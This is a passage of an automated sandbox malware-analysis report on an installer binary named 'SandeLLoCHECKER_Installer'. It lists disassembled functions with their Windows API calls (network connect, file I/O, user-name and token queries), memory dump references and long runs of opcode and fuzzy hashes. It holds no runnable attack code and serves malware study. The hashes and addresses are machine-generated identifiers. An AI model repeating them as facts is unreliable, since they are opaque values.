                                                                                                                        • API ID: Window$Long$CallProc
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 513923721-0
                                                                                                                        • Opcode ID: 5156c01b111453c37f2fbc396b8761aad00a2a21aa8bcadf3dd3a76cffd0ee2c
                                                                                                                        • Instruction ID: 92393be1f86b9011067a456391ce895e504beeb07e911668c03d4e949de3dc5d
                                                                                                                        • Opcode Fuzzy Hash: 5156c01b111453c37f2fbc396b8761aad00a2a21aa8bcadf3dd3a76cffd0ee2c
                                                                                                                        • Instruction Fuzzy Hash: 6B211871204700AFC7219F19DC84817BBF5FF99761B108A2EF8EAC26A0D732E9459F50
                                                                                                                        Function 009617F0 Relevance: 7.6, APIs: 5, Instructions: 64windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • MsgWaitForMultipleObjectsEx.USER32(00000001,00000000,000000FF,000005FF,00000004), ref: 00961811
                                                                                                                        • PeekMessageW.USER32(?,00000000), ref: 00961857
                                                                                                                        • TranslateMessage.USER32(00000000), ref: 00961862
                                                                                                                        • DispatchMessageW.USER32(00000000), ref: 00961869
                                                                                                                        • MsgWaitForMultipleObjectsEx.USER32(00000001,?,000000FF,000005FF,00000004), ref: 0096187B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Message$MultipleObjectsWait$DispatchPeekTranslate
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4084795276-0
                                                                                                                        • Opcode ID: badda8a4d7dbe0ebf0a3f616fdeb2050a83f2dabfb20242b8c4d313ffb9a2488
                                                                                                                        • Instruction ID: 0976e878bc7b0e4bdb8c553fca75ee659a612c0510d9eeaa1bd57a762ddf3152
                                                                                                                        • Opcode Fuzzy Hash: badda8a4d7dbe0ebf0a3f616fdeb2050a83f2dabfb20242b8c4d313ffb9a2488
                                                                                                                        • Instruction Fuzzy Hash: A1114C316443067AE620CB519D81FB777ECEB89774F540636FA10E70C0DB74E9858761
                                                                                                                        Function 0099A010 Relevance: 7.6, APIs: 5, Instructions: 62synchronizationnetworkCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ResetEvent.KERNEL32(?,?,?,00999442,?,?,?,?,?,00000003,00000000,C7BA013E,00000000), ref: 0099A022
                                                                                                                        • InternetConnectW.WININET(?,?,?,?,?,?,?), ref: 0099A045
                                                                                                                        • GetLastError.KERNEL32(?,?,?,00999442,?,?,?,?,?,00000003,00000000,C7BA013E,00000000), ref: 0099A04F
                                                                                                                        • WaitForSingleObject.KERNEL32(?,0000000A,?,?,?,00999442,?,?,?,?,?,00000003,00000000,C7BA013E,00000000), ref: 0099A085
                                                                                                                        • SetEvent.KERNEL32(?,?,?,?,00999442,?,?,?,?,?,00000003,00000000,C7BA013E,00000000), ref: 0099A0A8
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Event$ConnectErrorInternetLastObjectResetSingleWait
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3866874665-0
                                                                                                                        • Opcode ID: ee18dcaeccb77caeefb6d7cc2b83679e76d4be89537976bb8a835a4fbec99de1
                                                                                                                        • Instruction ID: de11c46267dd699a3358ff04e0e85807f2045889915d9042e887625715694689
                                                                                                                        • Opcode Fuzzy Hash: ee18dcaeccb77caeefb6d7cc2b83679e76d4be89537976bb8a835a4fbec99de1
                                                                                                                        • Instruction Fuzzy Hash: E311A3312047408EEF319B6DD948B577BE9EFA2324F00482EE08382571D765EC96C791
                                                                                                                        Function 00982DD0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 327COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • PathIsUNCW.SHLWAPI(?,C7BA013E,?,00000010,?), ref: 0098309A
                                                                                                                          • Part of subcall function 0095BF10: GetCurrentProcess.KERNEL32 ref: 0095BF58
                                                                                                                          • Part of subcall function 0095BF10: OpenProcessToken.ADVAPI32(00000000,00000008,00000000), ref: 0095BF65
                                                                                                                          • Part of subcall function 0095BF10: GetLastError.KERNEL32 ref: 0095BF6F
                                                                                                                          • Part of subcall function 0095BF10: CloseHandle.KERNEL32(00000000), ref: 0095C050
                                                                                                                          • Part of subcall function 0084ABE0: GetProcessHeap.KERNEL32 ref: 0084AC35
                                                                                                                          • Part of subcall function 0084ABE0: __Init_thread_footer.LIBCMT ref: 0084AC67
                                                                                                                          • Part of subcall function 0084ABE0: __Init_thread_footer.LIBCMT ref: 0084ACF2
                                                                                                                          • Part of subcall function 0084A190: FindResourceW.KERNEL32(00000000,?,00000006,00000000,00000000,00000000,0084A308,-00000010,?,00000000), ref: 0084A1B3
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$Init_thread_footer$CloseCurrentErrorFindHandleHeapLastOpenPathResourceToken
                                                                                                                        • String ID: Extraction path set to:$[WindowsVolume]$\\?\
                                                                                                                        • API String ID: 699919280-3538578949
                                                                                                                        • Opcode ID: d6618884233df5ab06f17e50dc2e0878b85065e6c19b6ef1b55944c10906bed1
                                                                                                                        • Instruction ID: 26087d86aeb9390c974a89dde2b67a22878f9584bf7d80d8e6a081aba69ef8c4
                                                                                                                        • Opcode Fuzzy Hash: d6618884233df5ab06f17e50dc2e0878b85065e6c19b6ef1b55944c10906bed1
                                                                                                                        • Instruction Fuzzy Hash: 93C1A23090160A9BDB14EF6CC858BAEF7B5FF45714F1482A8E811EB392DB709E45CB91
                                                                                                                        Function 0097A9E0 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 263COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0097A850: GetTickCount.KERNEL32 ref: 0097A8D4
                                                                                                                          • Part of subcall function 0097A850: __Xtime_get_ticks.LIBCPMT ref: 0097A8DC
                                                                                                                          • Part of subcall function 0097A850: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0097A926
                                                                                                                          • Part of subcall function 0099F2B0: GetUserNameW.ADVAPI32(?,?), ref: 0099F345
                                                                                                                          • Part of subcall function 0099F2B0: GetLastError.KERNEL32 ref: 0099F34B
                                                                                                                          • Part of subcall function 0099F2B0: GetUserNameW.ADVAPI32(?,?), ref: 0099F393
                                                                                                                          • Part of subcall function 0099F2B0: GetEnvironmentVariableW.KERNEL32(UserDomain,00000000,00000000), ref: 0099F3C9
                                                                                                                          • Part of subcall function 0099F2B0: GetEnvironmentVariableW.KERNEL32(UserDomain,?,00000000,00000000,00000000), ref: 0099F413
                                                                                                                        • __Init_thread_footer.LIBCMT ref: 0097AB11
                                                                                                                        • GetCurrentProcess.KERNEL32(00000008,?,C7BA013E), ref: 0097AD08
                                                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 0097AD0F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: EnvironmentNameProcessUserVariable$CountCurrentErrorInit_thread_footerLastOpenTickTokenUnothrow_t@std@@@Xtime_get_ticks__ehfuncinfo$??2@
                                                                                                                        • String ID: \/:*?"<>|
                                                                                                                        • API String ID: 1521599615-3830478854
                                                                                                                        • Opcode ID: a4a8311a8d2e6087b02b819d021cb2c7ca5f87644010b97553d34671cc0d75b2
                                                                                                                        • Instruction ID: 7faa3b9d1e426e6f870384d2015418029fd5108c1d7c81cf0e8513ad8a2c7a24
                                                                                                                        • Opcode Fuzzy Hash: a4a8311a8d2e6087b02b819d021cb2c7ca5f87644010b97553d34671cc0d75b2
                                                                                                                        • Instruction Fuzzy Hash: 55B10271D00208DFDB24DFA8C9457EEBBB5FF54304F248269E419AB291EB346E45CB92
                                                                                                                        Function 009B3630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateFileW.KERNEL32(00000000,40000000,00000001,00000000,00000002,00000080,00000000,C7BA013E,?,6C4B37E0), ref: 009B3692
                                                                                                                        • WriteFile.KERNEL32(?,?,00000008,00000008,00000000,?,6C4B37E0), ref: 009B3728
                                                                                                                        • CloseHandle.KERNEL32(?,?,6C4B37E0), ref: 009B379C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$CloseCreateHandleWrite
                                                                                                                        • String ID: 7Kl
                                                                                                                        • API String ID: 1065093856-1576159710
                                                                                                                        • Opcode ID: cc7afbc5620e92d8d2951af717b88959ceeb00c20c59b20b010c94c841ea70af
                                                                                                                        • Instruction ID: e5f254598bee60dffda2590018d0549189f4d159cd70a32388065e489c88bdf4
                                                                                                                        • Opcode Fuzzy Hash: cc7afbc5620e92d8d2951af717b88959ceeb00c20c59b20b010c94c841ea70af
                                                                                                                        • Instruction Fuzzy Hash: 4B5129B1910219AFDF10DFA4DD89BEEBBB9FF48714F148269E400B7290DB755A04CB64
                                                                                                                        Function 0097A550 Relevance: 6.1, APIs: 4, Instructions: 145fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,C7BA013E,?,00000010,?,0097DEC0,?), ref: 0097A5B6
                                                                                                                        • SetFilePointer.KERNEL32(00000000,?,00000010,00000000), ref: 0097A5FF
                                                                                                                        • ReadFile.KERNEL32(00000000,C7BA013E,?,?,00000000,00000078,?), ref: 0097A641
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0097A6BA
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$CloseCreateHandlePointerRead
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4133201480-0
                                                                                                                        • Opcode ID: cc37a7b39c44f80f66d0edf5404275e9dac79d3cc188c79218223bd6b1c6d5f8
                                                                                                                        • Instruction ID: b7b622be7a3636dc969a4e7c72b178f86ef7af1884034726ea141d517ed64919
                                                                                                                        • Opcode Fuzzy Hash: cc37a7b39c44f80f66d0edf5404275e9dac79d3cc188c79218223bd6b1c6d5f8
                                                                                                                        • Instruction Fuzzy Hash: 4B51AE719016099BDB11CBA8CC48BEEFBB8EF85324F288259E415AB2D1D7749D04CBA1
                                                                                                                        Function 00982270 Relevance: 6.0, APIs: 4, Instructions: 30threadwindowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00982279
                                                                                                                        • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A84460,000000FF), ref: 00982288
                                                                                                                        • PostMessageW.USER32(?,00000401,00000000,00000000), ref: 009822A6
                                                                                                                        • IsWindow.USER32(?), ref: 009822B5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$CurrentDestroyMessagePostThread
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3186974096-0
                                                                                                                        • Opcode ID: 0810a27df4821d45479a84ef29ba7c3330b200723318c656c06961257c2efd75
                                                                                                                        • Instruction ID: 88c3d0315258731382d2380ca05a3a5bbbc5080efd732e027439b0c19c1f24f4
                                                                                                                        • Opcode Fuzzy Hash: 0810a27df4821d45479a84ef29ba7c3330b200723318c656c06961257c2efd75
                                                                                                                        • Instruction Fuzzy Hash: A8F0A7711017509FD774AB28EE08F537BE9AF58B11F10092DE09697A90D7B9F881CB54
                                                                                                                        Function 00960BA0 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 345COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0084ABE0: GetProcessHeap.KERNEL32 ref: 0084AC35
                                                                                                                          • Part of subcall function 0084ABE0: __Init_thread_footer.LIBCMT ref: 0084AC67
                                                                                                                          • Part of subcall function 0084ABE0: __Init_thread_footer.LIBCMT ref: 0084ACF2
                                                                                                                        • PathIsUNCW.SHLWAPI(?,?,?,?,00000000,00000000,00A7F3AF,000000FF), ref: 00960D36
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Init_thread_footer$HeapPathProcess
                                                                                                                        • String ID: \\?\$\\?\UNC\
                                                                                                                        • API String ID: 806983814-3019864461
                                                                                                                        • Opcode ID: 5b710944df69cde4e71672f8ef5df7f0b7f435bb9fd9401c80e106fcca974111
                                                                                                                        • Instruction ID: 41de3b427e1b279a55526a3703ff19c7f0b69e4aab7ba677085c793e08ce9ca3
                                                                                                                        • Opcode Fuzzy Hash: 5b710944df69cde4e71672f8ef5df7f0b7f435bb9fd9401c80e106fcca974111
                                                                                                                        • Instruction Fuzzy Hash: ECC191719006099FDB00DBA8CD85BAEF7F8FF85320F148269E415E72D1EB75A904CBA1
                                                                                                                        Function 00A15943 Relevance: 5.0, APIs: 4, Instructions: 41memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000008,00000000,0098AB8E,?,?,?,?,?,?), ref: 00A15948
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?), ref: 00A1594F
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?), ref: 00A15995
                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,?,?), ref: 00A1599C
                                                                                                                          • Part of subcall function 00A157E1: GetProcessHeap.KERNEL32(00000008,0000000D,00000000,?,00A1598B,?,?,?,?,?,?,?), ref: 00A15805
                                                                                                                          • Part of subcall function 00A157E1: HeapAlloc.KERNEL32(00000000,?,00A1598B,?,?,?,?,?,?,?), ref: 00A1580C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$Process$Alloc$Free
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1864747095-0
                                                                                                                        • Opcode ID: 22fabd5fdf0a7b954bc9791b9cdad98991d5fd467bcedc4770107c266a4c91f8
                                                                                                                        • Instruction ID: 83a9e589936a116c76787f286d029034499396e8dfe32c972a2c0098c340f600
                                                                                                                        • Opcode Fuzzy Hash: 22fabd5fdf0a7b954bc9791b9cdad98991d5fd467bcedc4770107c266a4c91f8
                                                                                                                        • Instruction Fuzzy Hash: CFF0BB76F44B12DFC72467F87C09ADA29699FC07717254536F446C6155EE20C8824761
                                                                                                                        Function 00A3019C Relevance: 4.7, APIs: 3, Instructions: 202COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __freea.LIBCMT ref: 00A3034B
                                                                                                                          • Part of subcall function 00A2E1F7: RtlAllocateHeap.NTDLL(00000000,00A35D4E,?,?,00A35D4E,00000220,?,?,?), ref: 00A2E229
                                                                                                                        • __freea.LIBCMT ref: 00A30360
                                                                                                                        • __freea.LIBCMT ref: 00A30370
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __freea$AllocateHeap
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2243444508-0
                                                                                                                        • Opcode ID: c08c665647b145c639390f9ff562a0af216ab2b9fe1a035c8c7bfa0e74047b76
                                                                                                                        • Instruction ID: 48425570a45b02916691e05de5a8de807e345d5219239664c4b46fdab3c2d38e
                                                                                                                        • Opcode Fuzzy Hash: c08c665647b145c639390f9ff562a0af216ab2b9fe1a035c8c7bfa0e74047b76
                                                                                                                        • Instruction Fuzzy Hash: 3151B172A0021AAFEF219FA5DD96EFF3AA9EF44350F194128FD08DA151EB70DC508760
                                                                                                                        Function 00985DF0 Relevance: 4.7, APIs: 3, Instructions: 192fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetFilePointer.KERNEL32(?,?,?,00000000,C7BA013E,?,?), ref: 00985E57
                                                                                                                        • ReadFile.KERNEL32(?,00000000,00000018,?,00000000), ref: 00985F64
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$PointerRead
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3154509469-0
                                                                                                                        • Opcode ID: 3039df0779b1ab237dfe76a3cc95420367fa11a6b32c91c757d77e0efa5d987b
                                                                                                                        • Instruction ID: 13db13b8148784836eaba284a24f8f4667e87ef5b9e26f307ef94a842b4e44b6
                                                                                                                        • Opcode Fuzzy Hash: 3039df0779b1ab237dfe76a3cc95420367fa11a6b32c91c757d77e0efa5d987b
                                                                                                                        • Instruction Fuzzy Hash: 55617071D00609EFDB04DFA8C945B9DFBB4FB49320F10826AE825E7391DB759A05CB91
                                                                                                                        Function 009831B0 Relevance: 4.7, APIs: 3, Instructions: 183fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,C7BA013E,?,00000000,?,80004005,?,00000000), ref: 0098324E
                                                                                                                        • GetLastError.KERNEL32 ref: 00983286
                                                                                                                        • GetLastError.KERNEL32(?), ref: 0098331F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$CreateFile
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1722934493-0
                                                                                                                        • Opcode ID: 4f9c22d66514ccf958ca6495942d9fb63961d1c72284001fb9e42d63044d6a1f
                                                                                                                        • Instruction ID: 3be5ae7df4ee7a825c0fd9a8d9eaa1a66192758192d642bba634f32c804f93a3
